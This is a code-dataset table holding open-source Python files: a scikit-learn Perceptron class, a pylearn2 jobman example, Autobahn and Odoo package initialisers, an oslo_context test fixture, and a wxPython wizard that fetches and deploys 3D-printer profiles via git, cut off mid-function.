repo_name (stringlengths 5–100) | path (stringlengths 4–299) | copies (stringclasses, 990 values) | size (stringlengths 4–7) | content (stringlengths 666–1.03M) | license (stringclasses, 15 values) | hash (int64, -9,223,351,895,964,839,000 to 9,223,297,778B) | line_mean (float64, 3.17–100) | line_max (int64, 7–1k) | alpha_frac (float64, 0.25–0.98) | autogenerated (bool, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|
altairpearl/scikit-learn | sklearn/linear_model/perceptron.py | 39 | 3863 | # Author: Mathieu Blondel
# License: BSD 3 clause
from .stochastic_gradient import BaseSGDClassifier
from ..feature_selection.from_model import _LearntSelectorMixin
class Perceptron(BaseSGDClassifier, _LearntSelectorMixin):
"""Perceptron
Read more in the :ref:`User Guide <perceptron>`.
Parameters
----------
penalty : None, 'l2' or 'l1' or 'elasticnet'
The penalty (aka regularization term) to be used. Defaults to None.
alpha : float
Constant that multiplies the regularization term if regularization is
used. Defaults to 0.0001
fit_intercept : bool
Whether the intercept should be estimated or not. If False, the
data is assumed to be already centered. Defaults to True.
n_iter : int, optional
The number of passes over the training data (aka epochs).
Defaults to 5.
shuffle : bool, optional, default True
Whether or not the training data should be shuffled after each epoch.
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use when
shuffling the data.
verbose : integer, optional
The verbosity level
n_jobs : integer, optional
The number of CPUs to use to do the OVA (One Versus All, for
multi-class problems) computation. -1 means 'all CPUs'. Defaults
to 1.
eta0 : double
Constant by which the updates are multiplied. Defaults to 1.
class_weight : dict, {class_label: weight} or "balanced" or None, optional
Preset for the class_weight fit parameter.
Weights associated with classes. If not given, all classes
are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
warm_start : bool, optional
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
Attributes
----------
coef_ : array, shape = [1, n_features] if n_classes == 2 else [n_classes,\
n_features]
Weights assigned to the features.
intercept_ : array, shape = [1] if n_classes == 2 else [n_classes]
Constants in decision function.
Notes
-----
`Perceptron` and `SGDClassifier` share the same underlying implementation.
In fact, `Perceptron()` is equivalent to `SGDClassifier(loss="perceptron",
eta0=1, learning_rate="constant", penalty=None)`.
See also
--------
SGDClassifier
References
----------
https://en.wikipedia.org/wiki/Perceptron and references therein.
"""
def __init__(self, penalty=None, alpha=0.0001, fit_intercept=True,
n_iter=5, shuffle=True, verbose=0, eta0=1.0, n_jobs=1,
random_state=0, class_weight=None, warm_start=False):
super(Perceptron, self).__init__(loss="perceptron",
penalty=penalty,
alpha=alpha, l1_ratio=0,
fit_intercept=fit_intercept,
n_iter=n_iter,
shuffle=shuffle,
verbose=verbose,
random_state=random_state,
learning_rate="constant",
eta0=eta0,
power_t=0.5,
warm_start=warm_start,
class_weight=class_weight,
n_jobs=n_jobs)
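# Illustrative usage sketch, not from the original scikit-learn module: the
# Notes section above states that Perceptron() is equivalent to
# SGDClassifier(loss="perceptron", eta0=1, learning_rate="constant",
# penalty=None). The toy dataset and variable names below are assumptions made
# purely for illustration.
if __name__ == "__main__":
    from sklearn.datasets import load_iris
    from sklearn.linear_model import Perceptron, SGDClassifier

    data = load_iris()
    X, y = data.data, data.target
    p = Perceptron(n_iter=5, random_state=0).fit(X, y)
    s = SGDClassifier(loss="perceptron", eta0=1.0, learning_rate="constant",
                      penalty=None, n_iter=5, random_state=0).fit(X, y)
    # Both estimators share the same underlying implementation, so the learned
    # weights are expected to coincide.
    print((p.coef_ == s.coef_).all())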
| bsd-3-clause | -653,435,787,549,262,000 | 35.790476 | 78 | 0.574165 | false |
pkainz/pylearn2 | pylearn2/scripts/jobman/tester.py | 44 | 3126 | """
This is an example script that inserts pylearn2 yaml code into a jobman database.
The code below defines a yaml template string in state.yaml_template and
the values of its hyper-parameters in state.hyper_parameters, and uses
jobman to run the code located in state.extract_results on the resulting
model.
Note that the job is only added here; it can be launched later as usual
(please check how to start jobs using jobman on the jobman tutorial
website).
"""
from nose.plugins.skip import SkipTest
try:
from jobman.tools import DD, flatten
from jobman import api0, sql
except ImportError:
raise SkipTest()
from pylearn2.scripts.jobman import experiment
def result_extractor(train_obj):
"""
This is a user-specific function that is used by jobman to extract results.
The returned dictionary will be saved in state.results.
"""
import numpy
channels = train_obj.model.monitor.channels
train_cost = channels['sgd_cost(ExhaustiveSGD[X])']
best_epoch = numpy.argmin(train_cost.val_record)
best_rec_error = train_cost.val_record[best_epoch]
batch_num = train_cost.batch_record[best_epoch]
return dict(
best_epoch=best_epoch,
train_rec_error=best_rec_error,
batch_num=batch_num)
if __name__ == '__main__':
db = api0.open_db('sqlite:///test.db?table=test_jobman_pylearn2')
state = DD()
state.yaml_template = '''
!obj:pylearn2.train.Train {
"dataset": !obj:pylearn2.datasets.npy_npz.NpyDataset &dataset {
"file" : "%(file)s"
},
"model": !obj:pylearn2.autoencoder.ContractiveAutoencoder {
"nvis" : %(nvis)d,
"nhid" : %(nhid)d,
"irange" : 0.05,
"act_enc": "sigmoid", #for some reason only sigmoid function works
"act_dec": "sigmoid",
},
"algorithm": !obj:pylearn2.training_algorithms.sgd.SGD {
"learning_rate" : %(learning_rate)f,
"batch_size" : %(batch_size)d,
"monitoring_batches" : 5,
"monitoring_dataset" : *dataset,
"cost" : !obj:pylearn2.costs.cost.SumOfCosts {
"costs": [
[1.0, !obj:pylearn2.costs.autoencoder.MeanBinaryCrossEntropy {} ],
[%(coefficient)f, !obj:pylearn2.costs.cost.MethodCost { method: 'contraction_penalty' } ]
]
},
"termination_criterion" : %(term_crit)s,
}
}
'''
state.hyper_parameters = {
"file": "${PYLEARN2_DATA_PATH}/UTLC/pca/sylvester_train_x_pca32.npy",
"nvis": 32,
"nhid": 6,
"learning_rate": 0.1,
"batch_size": 10,
"coefficient": 0.5,
"term_crit": {
"__builder__": "pylearn2.training_algorithms.sgd.EpochCounter",
"max_epochs": 2
}
}
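# Note (hedged, based on matching keys rather than on jobman internals): the
# %(file)s, %(nvis)d, %(nhid)d, %(learning_rate)f, %(batch_size)d,
# %(coefficient)f and %(term_crit)s placeholders in state.yaml_template are
# expected to be filled in from the state.hyper_parameters dictionary above
# when jobman runs the experiment.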
state.extract_results = "pylearn2.scripts.jobman.tester.result_extractor"
sql.insert_job(
experiment.train_experiment,
flatten(state),
db,
force_dup=True)
| bsd-3-clause | -3,797,899,547,524,971,500 | 31.226804 | 109 | 0.590211 | false |
shadda/AutobahnPython | autobahn/autobahn/__init__.py | 7 | 1043 | ###############################################################################
##
## Copyright 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from _version import __version__
version = __version__ # backward compat.
import util
import useragent
import flashpolicy
import httpstatus
import utf8validator
import xormasker
import websocket
import resource
import prefixmap
import wamp
| apache-2.0 | -8,729,113,815,589,294,000 | 31.645161 | 79 | 0.615532 | false |
esse-io/zen-common | oslo-modules/oslo_context/fixture.py | 3 | 1505 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
from oslo_context import context
class ClearRequestContext(fixtures.Fixture):
"""Clears any cached RequestContext
This resets RequestContext at the beginning and end of tests that
use this fixture to ensure that we have a clean slate for running
tests, and that we leave a clean slate for other tests that might
run later in the same process.
"""
def setUp(self):
super(ClearRequestContext, self).setUp()
# we need to clear both when we start, and when we finish,
# because there might be other tests running that don't handle
# this correctly.
self._remove_cached_context()
self.addCleanup(self._remove_cached_context)
def _remove_cached_context(self):
"""Remove the thread-local context stored in the module."""
try:
del context._request_store.context
except AttributeError:
pass
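# Illustrative usage sketch, not part of the original oslo_context module: a
# hypothetical testtools-based test case consuming the fixture via
# useFixture(). The class and test names are assumptions for illustration.
import testtools


class ClearRequestContextExampleTest(testtools.TestCase):

    def setUp(self):
        super(ClearRequestContextExampleTest, self).setUp()
        # Guarantees a clean slate before the test and after its cleanups run.
        self.useFixture(ClearRequestContext())

    def test_starts_without_cached_context(self):
        self.assertFalse(hasattr(context._request_store, 'context'))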
| apache-2.0 | -5,009,131,992,932,061,000 | 36.625 | 78 | 0.695681 | false |
ehirt/odoo | addons/mrp/report/__init__.py | 378 | 1122 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import price
import workcenter_load
import bom_structure
import mrp_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -7,418,274,346,170,354,000 | 39.071429 | 78 | 0.62656 | false |
dob71/x2swn | x2Profiler.py | 1 | 38339 | #!/usr/bin/env python
#
# This file is part of the X2SW bundle. You can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Printrun. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import wx
import wx.wizard as wiz
import re
import tempfile
import shutil
from dulwich.client import get_transport_and_path
from dulwich.errors import ApplyDeltaError
from dulwich.index import Index, build_index_from_tree
from dulwich.pack import Pack, sha_to_hex
from dulwich.repo import Repo
from dulwich.server import update_server_info
from dulwich import client
VERSION_FILE = 'version.txt'
COMPAT_FILE = '.compat_ver_str.txt'
pronterface_restart = False
########################################################################
class TitledPage(wiz.WizardPageSimple):
""""""
#----------------------------------------------------------------------
def __init__(self, parent, title):
"""Constructor"""
wiz.WizardPageSimple.__init__(self, parent)
sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer = sizer
self.SetSizer(sizer)
title = wx.StaticText(self, -1, title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
sizer.Add(title, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
sizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND|wx.ALL, 5)
########################################################################
class UpdateRepoPage(wiz.PyWizardPage):
"""Startup wizard page"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sizer.Add(wx.StaticText(self, -1, "\
This wizard helps you select and deploy X2SW profiles for your printer. Each\n\
X2SW profile contains configuration files for multiple software components\n\
(Slic3r profiles, Skeinforge profiles, Pronterface rc file).\n\
\n\
The profiles from either the online or local X2SW profile repository can be\n\
deployed. When deployed the profile files override the currently active\n\
configuration files of the software included in X2SW bundle."), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.offline_mode = wx.CheckBox(self, wx.ID_ANY, 'Use local repository (off-line mode)')
self.sizer.Add(self.offline_mode)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
x2ProfilerApp.repo = None
if not x2ProfilerApp.tmp_repo_path == None:
try:
shutil.rmtree(x2ProfilerApp.tmp_repo_path)
except:
wx.MessageBox('Unable to delete: ' + x2ProfilerApp.tmp_repo_path, '', style = wx.OK|wx.ICON_EXCLAMATION)
pass
x2ProfilerApp.tmp_repo_path = None
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
if not self.offline_mode.GetValue():
return self.next
else:
return self.next.GetNext()
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
#----------------------------------------------------------------------
def OnPageChanging(self, event):
# If no temp repo then we need to use the local one
global x2ProfilerApp
try:
if self.offline_mode.GetValue():
x2ProfilerApp.repo = Repo(x2ProfilerApp.x2swProfilesPath)
else:
x2ProfilerApp.tmp_repo_path = tempfile.mkdtemp()
x2ProfilerApp.repo = Repo.init(x2ProfilerApp.tmp_repo_path)
except:
pass
if x2ProfilerApp.repo == None:
event.Veto()
########################################################################
class DownloadingPage(wiz.PyWizardPage):
"""Wizard page for updating the profiles repo"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
global x2ProfilerApp
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.status = wx.StaticText(self, -1, "Downloading from " + x2ProfilerApp.repo_url + "...")
self.sizer.Add(self.status, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.count = 0
self.gauge = wx.Gauge(self, -1, 100, size = (250, 25))
self.sizer.Add(self.gauge)
self.gauge.SetBezelFace(3)
self.gauge.SetShadowWidth(3)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
self.lasttopic = None
self.msgbuf = ''
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.Show()
self.GetParent().Update()
try:
self.cmd_fetch(x2ProfilerApp.repo, x2ProfilerApp.repo_url)
self.gauge.SetValue(100)
self.status.SetLabel('Done fetching from ' + x2ProfilerApp.repo_url)
except Exception as e:
self.status.SetLabel('Failure to create temporary repository for:\n' + x2ProfilerApp.repo_url)
self.gauge.SetValue(0)
wx.MessageBox("Error:\n\n" + str(e), '', style = wx.OK|wx.ICON_EXCLAMATION)
#----------------------------------------------------------------------
def flush(self, msg=None):
if self.lasttopic:
self.status.SetLabel(self.lasttopic)
self.gauge.SetValue(0)
self.lasttopic = None
if msg:
self.status.SetLabel(msg)
#----------------------------------------------------------------------
# as it is done in hggit (not sure why it has to be so complex...)
def progress(self, msg):
# Counting objects: 3, done.
# Compressing objects: 100% (3/3), done.
# Total 3 (delta 0), reused 0 (delta 0)
msgs = re.split('[\r\n]', self.msgbuf + msg)
self.msgbuf = msgs.pop()
for msg in msgs:
### for debugging ### print 'msg:' + msg + '\n'
td = msg.split(':', 1)
data = td.pop()
if not td:
self.flush(data)
continue
topic = td[0]
m = re.search('\((\d+)/(\d+)\)', data)
if m:
if self.lasttopic and self.lasttopic != topic:
self.flush()
self.lasttopic = topic
pos, total = map(int, m.group(1, 2))
try:
perc = int((pos * 100) / total)
except:
perc = 0
self.gauge.SetValue(perc)
else:
self.flush(msg)
self.Show()
self.GetParent().Update()
#----------------------------------------------------------------------
def cmd_fetch(self, r, url_path):
c, path = get_transport_and_path(url_path)
c._fetch_capabilities.remove('thin-pack')
### for debugging ### c = client.SubprocessGitClient(thin_packs=False)
path = url_path
determine_wants = r.object_store.determine_wants_all
refs = c.fetch(path, r, progress=self.progress)
for k in refs.keys():
if k[-3:] == '^{}': # Annotated tag ref
k = k[:-3]
r[k] = refs[k]
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class SelectProfilesPage(wiz.PyWizardPage):
"""Wizard page for selecting what profiles to deploy"""
REF_TYPE_TAG = 1
REF_TYPE_HEAD = 2
REF_TYPE_RHEAD = 3
#----------------------------------------------------------------------
def __init__(self, parent, title):
global x2ProfilerApp
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.under_title_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.tree_title = wx.StaticText(self, -1, "Select the printer profile")
self.under_title_sizer.Add(self.tree_title, 1, wx.ALL|wx.ALIGN_LEFT, 0)
self.show_all = wx.CheckBox(self, wx.ID_ANY, 'Show All')
self.show_all.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.all = False
self.under_title_sizer.Add(self.show_all, 0, wx.ALL|wx.ALIGN_RIGHT, 0)
self.sizer.Add(self.under_title_sizer, 0, wx.ALL|wx.EXPAND, 5)
self.tree = wx.TreeCtrl(self, -1, style = wx.TR_HAS_BUTTONS|wx.TR_HAS_VARIABLE_ROW_HEIGHT)
image_list = wx.ImageList(16, 16)
self.profile = image_list.Add(wx.Image("images/profile.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.profile_rb = image_list.Add(wx.Image("images/profile_rb.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.profile_lb = image_list.Add(wx.Image("images/profile_lb.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.folder = image_list.Add(wx.Image("images/folder.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.tree.AssignImageList(image_list)
self.sizer.Add(self.tree, 2, wx.EXPAND)
self.sizer.Add(wx.StaticText(self, -1, "Selected profile description:"), 0, wx.ALL, 5)
self.descript = wx.TextCtrl(self, -1, '', style = wx.TE_READONLY | wx.TE_MULTILINE)
self.sizer.Add(self.descript, 1, wx.EXPAND)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
self.selection = None
#----------------------------------------------------------------------
def fillTree(self, refsList, path, node):
for item_name,item_file,ref_type in refsList[path]:
child_path = path + '/' + item_name
if ref_type == self.REF_TYPE_TAG:
child_ref_path = 'refs/tags' + child_path[4:]
prof_image = self.profile
elif ref_type == self.REF_TYPE_HEAD:
child_ref_path = 'refs/heads' + child_path[4:]
prof_image = self.profile_lb
elif ref_type == self.REF_TYPE_RHEAD:
child_ref_path = 'refs/remotes/origin' + child_path[4:]
prof_image = self.profile_rb
### for debugging ### print child_ref_path
child = self.tree.AppendItem(node, item_name)
if item_file:
child_ref_sha = self.refs[child_ref_path]
self.tree.SetPyData(child, child_ref_sha)
self.tree.SetItemImage(child, prof_image, wx.TreeItemIcon_Normal)
else:
self.tree.SetItemImage(child, self.folder, wx.TreeItemIcon_Normal)
if refsList.has_key(child_path):
self.fillTree(refsList, child_path, child)
#----------------------------------------------------------------------
def Run(self):
# Prepare a tree-structured dictionary of refs paths
global x2ProfilerApp
self.repo = x2ProfilerApp.repo
self.refs = self.repo.get_refs()
refsList = {}
# Make remote origin heads look similar to tags and local heads
refkeys = ['refs/rheads'+item[19:] if item[:19]=='refs/remotes/origin' else item for item in self.refs.keys()]
reflist = sorted(sorted(refkeys),key=lambda x: -len(x.split('/')))
### for debugging #### print reflist
for ref in reflist:
parts = ref.split('/')
# We only use refs that have format refs/<tags|heads|rheads>/vX.X.X.X/<type>/...
# Filter out one-level refs and anything that is neither tag or head
if parts[0] != 'refs' or len(parts) <= 4:
continue
if parts[1] != 'tags' and parts[1] != 'heads' and parts[1] != 'rheads':
continue
# Is it a tag, a local branch head or remote branch head?
ref_type = self.REF_TYPE_TAG
if parts[1] == 'heads':
ref_type = self.REF_TYPE_HEAD
elif parts[1] == 'rheads':
ref_type = self.REF_TYPE_RHEAD
ver_prefix = parts[2]
if not self.all and not ver_prefix.startswith('v' + x2ProfilerApp.ver_match_str):
continue
parts[1] = 'root'
for ii in range(2, len(parts)):
key = '/'.join(parts[1:ii])
# see if already have the node path we are about to add
if refsList.has_key(key + '/' + parts[ii]):
continue
# build reference key
# If at the end of the branch (i.e. the tag/head ref file name)
file_ref = False
if ii >= len(parts)-1:
file_ref = True
# Still going down the ref's path...
# If we already started adding items to this subtree
if refsList.has_key(key):
refsList[key].append([parts[ii],file_ref,ref_type])
else:
refsList[key]=[[parts[ii],file_ref,ref_type]]
### for debugging ### print 'ii: '+ str(ii) +' ### key: ' + key + ' ### add: ' + parts[ii]
# Build the UI tree (can do it above, but cleaner to separate)
self.tree.DeleteAllItems()
root_str = "FDM 3D Printer Profiles for X2SW"
if self.all or len(x2ProfilerApp.ver[0]) == 0:
root_str = root_str + " (all versions)"
else:
root_str = root_str + " v" + x2ProfilerApp.ver[0]
root = self.tree.AddRoot(root_str)
self.tree.SetItemImage(root, self.folder, wx.TreeItemIcon_Normal)
if refsList.has_key('root'):
self.fillTree(refsList, 'root', root)
self.tree.Expand(root)
# On/off next button based on either a profile was selected or not
self.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelChanged, self.tree)
if self.selection != None:
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def OnSelChanged(self, event):
global x2ProfilerApp
self.selection = self.tree.GetPyData(event.GetItem())
if self.selection != None:
try:
self.ShowDescription(self.selection)
x2ProfilerApp.selection = self.selection
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
except:
x2ProfilerApp.selection = None
self.descript.SetValue('')
pass
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
x2ProfilerApp.selection = None
self.descript.SetValue('')
event.Skip()
#----------------------------------------------------------------------
def ShowDescription(self, ref):
o = self.repo[ref]
if o.type_name == 'tag':
message = 'By: ' + o.tagger + '\n'
#message += 'Type: annotated tag\n'
message += o.message
elif o.type_name == 'commit':
message = 'By: ' + o.author + '\n'
#message += 'Type: tagged commit\n'
message += o.message
self.descript.SetValue(message)
#----------------------------------------------------------------------
def onCheckbox(self, event):
self.all = self.show_all.GetValue()
self.Run()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class ChooseModePage(wiz.PyWizardPage):
"""Wizard page for managing in-place mode"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, "\
This page helps to control where the X2SW profile configuration files are stored.\n\
If the \"in-place\" mode is ON all the included software stores the config files\n\
locally under \".x2sw\" in X2SW installation folder. If it is OFF the files are\n\
stored under \".x2sw\" in the user home folder.\n\
\n\
The \"in-place\" mode is configured per user account and applies to all installed\n\
copies of the X2SW bundle. The deployment path for the mode chosen is shown above.\n\
\n\
If you want to change the \"in-place\" mode setting and skip the profile deployment\n\
step, cancel the wizard after choosing the desired mode."), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.inplace_mode = wx.CheckBox(self, wx.ID_ANY, 'Use In-Place mode')
self.sizer.Add(self.inplace_mode)
if os.path.exists(os.path.join(os.path.expanduser('~'), '.x2sw', '.use_local')):
self.inplace_mode.SetValue(True)
self.inplace_mode.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def UpdatePageUi(self):
global x2ProfilerApp
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
if self.selection == None:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
self.UpdatePageUi()
#----------------------------------------------------------------------
def onCheckbox(self, event):
global x2ProfilerApp
inplace_path = os.path.join(os.path.expanduser('~'), '.x2sw')
inplace_file = os.path.join(inplace_path, '.use_local')
if not os.path.exists(inplace_path):
os.mkdir(inplace_path)
if self.inplace_mode.IsChecked():
with file(inplace_file, 'a'):
pass
else:
os.remove(inplace_file)
x2ProfilerApp.changes = True
x2ProfilerApp.DetermineProfilesPaths()
self.UpdatePageUi()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class DeployPage(wiz.PyWizardPage):
"""Wizard page confirming what where to deploy"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, "\
When you click \"Next\" the content of the X2SW profile selected will override\n\
the configuration files of all the X2SW software components under the \"Deployment\n\
path\". When ready confirm that you'd like to deploy and continue to the next page.\n\
\n\
WARNING: All the user files (if any) under the \"Deployment path\" will be lost!!!"), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.deploy_profile = wx.CheckBox(self, wx.ID_ANY, 'Deploy profile')
self.sizer.Add(self.deploy_profile)
self.deploy_profile.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def UpdatePageUi(self):
global x2ProfilerApp
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
self.deploy_profile.SetValue(False)
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
if self.selection != None:
self.deploy_profile.Enable()
else:
self.deploy_profile.Disable()
self.UpdatePageUi()
#----------------------------------------------------------------------
def onCheckbox(self, event):
if self.deploy_profile.IsChecked():
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def OnPageChanging(self, event):
# Disable buttons as we moving forward
if event.GetDirection():
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class ReportResultPage(wiz.PyWizardPage):
"""Wizard page completing the deployment"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.status = wx.StaticText(self, -1, "Processing...")
self.sizer.Add(self.status, 0, wx.ALL, 5)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def afterRun(self):
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
#----------------------------------------------------------------------
def Run(self):
self.status.SetLabel("Processing...")
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
